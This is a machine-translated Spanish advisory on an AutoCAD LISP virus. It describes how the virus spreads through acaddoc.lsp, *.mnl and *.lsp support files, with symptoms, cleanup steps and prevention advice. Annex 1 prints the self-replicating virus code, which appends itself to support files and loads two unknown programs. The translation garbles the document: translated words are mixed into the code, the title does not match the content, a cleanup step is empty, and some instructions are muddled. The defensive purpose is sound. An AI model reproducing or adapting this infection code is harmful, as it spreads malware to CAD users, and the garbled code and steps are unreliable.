Código fuente de la aplicación de la plataforma Rtt
Los párrafos primero, segundo y tercero a continuación no tienen contenido sustancial y se pueden omitir.
Introducción del virus:
Recientemente, un virus cad ha estado circulando en la empresa. Tanto Kaspersky como el software antivirus 360 pueden detectar el virus. Kaspersky descubrió un virus llamado virus. ALS.Pasdoc.a, y el virus encontrado por el software 360 Antivirus se llama Trojan. Script.29327 Lamentablemente, ni Kaspersky ni el software antivirus 360 pueden eliminarlo por completo.
2. Síntomas de envenenamiento:
Después de que la máquina se envenena, al ejecutar CAD, cada vez que se abre un archivo dwg, se generará un archivo acaddoc.lsp en el directorio donde se encuentra. Se encuentra el archivo dwg. Debido a que cada vez que se abre el dibujo, el programa de virus lleva a cabo un proceso de propagación y copia del virus, por lo que la velocidad del dibujo CAD es lenta.
Utiliza el Bloc de notas para comprobar cualquier*. El archivo lsp se encuentra en el directorio de soporte en la ruta de instalación de CAD. Si el final del archivo contiene el mismo código que el Anexo 1, se puede determinar que está envenenado.
Tres mecanismos de transmisión:
Al analizar el código fuente del virus, tenemos la siguiente comprensión preliminar de su mecanismo de transmisión:
Si la máquina ha sido infectado, los programas CAD Virus se cargarán automáticamente al abrir un nuevo archivo dwg. Y busque el archivo acad.mnl en el directorio de trabajo de cad para infectar *. mnl, busque el directorio de soporte de acad e infecte todos los archivos *. archivos lsp en este directorio. Al mismo tiempo, el virus genera el archivo acaddoc.lsp en el directorio donde se encuentra el archivo dwg abierto actualmente para facilitar la siguiente propagación.
Si esta máquina no está infectada y hay un archivo acaddoc.lsp en el directorio donde se encuentra el archivo dwg recién abierto, el virus infectará*. mln y *. El archivo lsp está en el directorio anterior.
El objetivo final del virus es llamar a dos programas ilegales, acadapq y acadappp. En cuanto a lo que harán estos dos programas, aún no hay una investigación en profundidad.
4. Pasos de limpieza:
1.
2. Buscar acadapq. *, acadappp. *, acadoc. *Eliminación completa de archivos seguida de la eliminación completa de dichos archivos. Antes de buscar, asegúrese de configurar "Mostrar todos los archivos y carpetas" en las opciones de carpeta y desmarque "Ocultar archivos protegidos del sistema operativo". Seleccione Buscar todos los archivos y carpetas al buscar y luego marque Buscar carpetas del sistema, Buscar archivos y carpetas ocultos y Buscar subcarpetas en las opciones avanzadas.
Si los archivos buscados no se pueden eliminar, primero vacíe la Papelera de reciclaje y luego búsquelos y elimínelos.
Nota: Hay AcadDoc.lsp (tenga en cuenta el caso) en el directorio del Explorador. No es un archivo de virus. Tenga cuidado de no eliminarlo por error.
3. Compruebe si hay un archivo boot.dat en el directorio raíz de la unidad c. Si es así, elimínelo.
4. Vaya al directorio C:\Documentos y configuraciones\Nombre de usuario\Datos de aplicación\Autodesk\AutoCAD 2006 (o AutoCAD 2004)\r 16.2\CHS\Support y abra todos los archivos *. mnl en este directorio usando el bloc de notas, elimine manualmente el mismo código que el archivo adjunto 1 (generalmente en. Y configure todos los atributos del archivo *. mnl modificados en "solo lectura".
5. Ingrese al soporte de instalación de CAD directorio debajo del directorio, procese todos los archivos *. lsp en este directorio. Recuerde configurar sus propiedades en solo lectura
Si hay varias versiones de CAD instaladas en esta máquina. Siga los pasos anteriores para comprobarlo una vez.
5. Medidas preventivas:
Porque el virus se propaga leyendo acaddoc.lsp en el directorio donde se encuentra la carpeta dwg. compruebe si la carpeta contiene los archivos de virus mencionados anteriormente. Si es así, elimínela. Al mismo tiempo, también debe asegurarse de que las carpetas pasadas a otros colegas no contengan los archivos mencionados anteriormente. *. Admite archivos lsp en directorios.
Por lo tanto, se recomienda crear una nueva carpeta, colocar los programas Lisp de uso común en esta carpeta y configurarla como directorio de búsqueda de trabajo en las opciones de CAD.
Las máquinas que no tienen software antivirus primero deben instalar un software antivirus (el software antivirus 360 es gratuito). Después de recibir los archivos de otras personas, primero deben instalar un antivirus.
Se recomienda no abrir directamente el archivo dwg en el disco público, sino descargarlo primero en su máquina local y luego abrirlo.
Anexo 1: Código de virus
(Set flag x t)
(Set bz "(Set flag x t)")
( Aplicación Telford (fuente objetivo BZ/bandera bandera 1 wjm wjm 1 texto)
(establezca la bandera en cero)
(establezca la bandera 1 t)
( si (objetivo de búsqueda de archivo)
(programa
(setq wjm1(objetivo abierto "r"))
(mientras (setq texto(leer línea wjm1))
(if (=textbz) (setq flag1 nil))
);Durante...
(Cerrar wjm1)
) ;progn
);if
(if bandera1
(programa
(setq wjm(código abierto "r")))
(setq wjm1(open target "a"))
(escribir línea (chr 13) wjm1)
(mientras (setq text(read-line wjm))
(if (=text bz)(establecer bandera t))
(if bandera
(programa
( Escribir texto de línea wjm1)
);progn
);if
);durante...
(Cerrar wjm1)
(Cerrar wjm)
);progn
);if
);Defuen
( setvar " cmdecho" 0)
(setq acadmnl (findfile "acad.mnl "))
(setq acadmnlpath(VL-filename-directoryacadmnl))
(setq mnlfilelist(VL-directory-files acadmnlpath " *.mnl "))
(setq mnlnum(length mnlfilelist))
(setq acadexe (findfile "acad.exe "))
(setq acad path(VL-filename-directory acad exe))
(setq support(strcat acadpath "\\support "))
(setq lspfilelist (Los archivos de directorio VL admiten " *.
lsp "))
(setq lspfilelist(append lspfilelist(lista "acaddoc.lsp"))
(setq lspnum(longitud lspfilelist))
(setq dwgname (getvar "dwgname "))
(setq dwgpath (findfile dwgname))
(if dwgpath
(program
( setq acaddocpath(ruta DWG del directorio de nombre de archivo VL))
(setq acaddocfile(strcat acaddocpath " \ \ acad doc . LSP "))
(setq mnln 0)
(mientras(& lt; mnln mnlnum)
(setq mnlfilename(strcat acadmnlpath " \ "(nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz )
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);Durante...
( Establecer lspn 0)
( while(<lspn lspnum)
(setq nombre de archivo LSP(strcat support " \ "(n lspn lista de archivos LSP)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
); p>
);progn
);if
(setq mnln 0)
(mientras(& lt; mnln mnlnum)
(setq mnlfilename(strcat acadmnlpath " \ "(nth mnln mnlfilelist)))
(setq mnln1 0)
( while(& lt; mnln1 mnlnum)
(setq mnlfilename 1(strcat acadmnlpath " \ "(nth mnln 1 mnlfilelist)))
(app mnl filename mnl filename 1 BZ)
(setq mnln 1( 1+mnln 1))
);durante...
(setq lspn1 0)
(mientras(& lt;lspn1 lspnum)
(setq lspfilename 1(strcat support " \ "(nth lspn1 lspfilelist)))
(app mnl filename LSP filename 1 BZ)
(setq lspn 1(1 +lspn 1))
);Durante...
(setq mnln (1+ mnln))
);Durante...
(establecer lspn 0)
(mientras(<lspn lspnum)
(setq nombre de archivo LSP(st
Soporte rcat " \ "(n lspn lista de archivos LSP)))
(setq lspn1 0)
( while(& lt;lspn1 lspnum)
(setq lspfilename 1(strcat support " \ "(nth lspn1 lspfilelist)))
(Aplicar nombre de archivo LSP nombre de archivo LSP 1 BZ)
(setq lspn 1(1+lspn 1) )
);Durante...
(setq mnln1 0)
(mientras(& lt; mnln1 mnlnum)
(setq mnlfilename 1(strcat acadmnlpath " \ "(nth mnln 1 mnlfilelist)))
(Aplicar nombre de archivo LSP mnl nombre de archivo 1 BZ)
(setq mnln 1(1+mnln 1))
);Durante...
(setq lspn (1+ lspn))
(cargar "acadapq")
(princ )
(Carga "acadappp.lsp")
(princ)
Además, después de matarlo, puedes ser inmune a las siguientes operaciones.
Primero busque todos los acad.lsp y acadapp.lsp en el disco duro y elimine todos los archivos buscados.
Luego copie el archivo acad2004.lsp (acad 14. LSP para la versión R14, acad2002.lsp para la versión 2002, etc.) en la carpeta Soporte de la carpeta donde se encuentra la instalación de CAD, cópielo dos veces y luego cambie los nombres de los archivos a acadapp.lsp y acad respectivamente.
Asegúrese de eliminar todos los acad.lsp y acadapp.lsp antes de poder realizar la operación anterior.